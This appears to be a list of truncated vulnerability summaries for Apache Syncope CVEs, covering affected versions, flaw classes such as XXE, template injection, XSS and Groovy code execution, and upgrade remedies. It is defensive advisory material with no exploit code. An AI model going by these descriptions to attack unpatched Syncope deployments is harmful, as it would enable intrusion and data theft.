CVE-2020-11977

What’s affected: Apache Syncope 2.1.x (before 2.1.7) with the Flowable extension enabled. Vulnerability: An administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including file reads/writes and code execution. Root cause (per sources): Flowable work...

CVE-2018-1322

CVE-2018-1322 affects Apache Syncope: 1.2.x before 1.2.11, 2.0.x before 2.0.8, and some unsupported releases (1.0.x, 1.1.x). The vulnerability allows an administrator with user-search entitlements to recover sensitive security values by manipulating the fiql and orderby parameters. The provided d...

CVE-2018-1321

Apache Syncope vulnerability CVE-2018-1321: An administrator with report and template entitlements can abuse XSLT to perform malicious operations (read/write files, execute code) in affected releases of Apache Syncope 1.2.x before 1.2.11 and 2.0.x before 2.0.8 (plus some unsupported 1.0/1.1 branc...

CVE-2020-1959

CVE-2020-1959 affects Apache Syncope prior to 2.1.6. The vulnerability is a Server-Side Template Injection in Java EL interpolation used in Java Bean Validation custom constraint violation messages. An attacker could inject arbitrary Java EL expressions via error message templates, resulting in u...

CVE-2018-17186

CVE-2018-17186 affects Apache Syncope (admin/workflow entitlements) where XML External Entity (XXE) via DTD in workflow definitions allows an attacker to read/write files and execute code. Multiple sources (CNVD/NVD/OSV/Veracode/GHSA) describe the vulnerability as involving DTD processing to perf...

CVE-2019-17557

CVE-2019-17557 describes a reflected XSS in the Apache Syncope EndUser UI login page, before versions 2.0.15 and 2.1.6, where the UI reflects the successMessage parameter in the URL query string, allowing an attacker to execute arbitrary JavaScript in a user’s browser. The issue is caused by insu...

CVE-2020-1961

The CVE-2020-1961 vulnerability affects Apache Syncope: Server-Side Template Injection in Mail templates via JEXL, enabling Remote Code Execution. Affected versions are 2.0.x before 2.0.15 and 2.1.x before 2.1.6. Remediation is to apply the patched releases (2.0.15 and 2.1.6) or equivalent fixes;...

CVE-2018-17184

CVE-2018-17184 affects Apache Syncope (notably syncope-core-persistence-jpa) where a design flaw allows stored XSS via injection of HTML-like elements containing JavaScript into Connector names, Report names, AnyTypeClass keys and Policy descriptions. The issue arises when an administrative user ...

CVE-2024-38503

Apache Syncope HTML-injection vulnerability (CVE-2024-38503) affects the Syncope Console and Enduser UI, where HTML tags can be injected into text fields during edits of users, groups, or other objects, potentially enabling exploits. The issue is documented across multiple sources (NVD, CNVD, Ver...

CVE-2024-45031

Apache Syncope is affected by a Stored XSS vulnerability (CVE-2024-45031) due to incomplete HTML sanitization when editing objects in the Syncope Console and Enduser interfaces. This can allow injection of XSS payloads that trigger for other users during normal usage and could lead to session hij...

CVE-2014-3503

Apache Syncope 1.1.x before 1.1.8 is affected. The issue stems from using insecure Random implementations to generate user passwords, enabling remote attackers to guess passwords by brute force. The fixed version is 1.1.8 (Ad libitum); upgrading is advised. If upgrading is not possible, apply off...

CVE-2014-0111

CVE-2014-0111 affects Apache Syncope: remote code execution via Apache Commons JEXL expressions in areas such as derived schema definition, user/role templates, and account links of resource mappings. Impact is that a authenticated administrator could inject and execute arbitrary Java code on the...

CVE-2025-65998

CVE-2025-65998 affects Apache Syncope where storing user passwords in the internal database with AES can expose cleartext passwords if the AES key is hard-coded in the source. The issue occurs when the AES option is enabled; the default key value is always used, enabling an attacker with internal...

CVE-2025-57738

CVE-2025-57738 affects Apache Syncope where Groovy-based extensions can be injected by a privileged administrator to execute code remotely. The cited advisories describe that Groovy code execution arises from runtime-loaded Groovy implementations, enabling remote execution within a running Syncop...

CVE-2026-42782

CVE-2026-42782 affects Apache Syncope 3.0–3.0.16, 4.0–4.0.5, and 4.1.0, caused by improper isolation that lets an administrator with sufficient entitlements load a malicious Groovy class whose static initializer reaches a non-sandboxed execution path. Remediation is to upgrade to 4.0.6 or 4.1.1, ...

CVE-2026-42797

CVE-2026-42797 (Apache Syncope) exposes a data-query related information disclosure via a misconfigured JEXL expression. An administrator with entitlements for Derived Schemas can craft a malicious JEXL expression that, if the requester also has User-read privileges, may access security-sensitive...

CVE-2026-23795

CVE-2026-23795 describes an XML External Entity (XXE) vulnerability in the Apache Syncope Console. An administrator with sufficient entitlements to create or edit Keymaster parameters can craft malicious XML text to trigger XXE, potentially leaking sensitive data. Affected versions: Apache Syncop...

CVE-2026-23794

Summary: CVE-2026-23794 is a reflected XSS affecting Apache Syncope Enduser Login page. A attacker can lure a user to click a crafted link and, upon login, potentially steal credentials. Affected versions: 3.0–3.0.15 and 4.0–4.0.3. Remediation: upgrade to 3.0.16 or 4.0.4 (or later). The CVSS v3.1...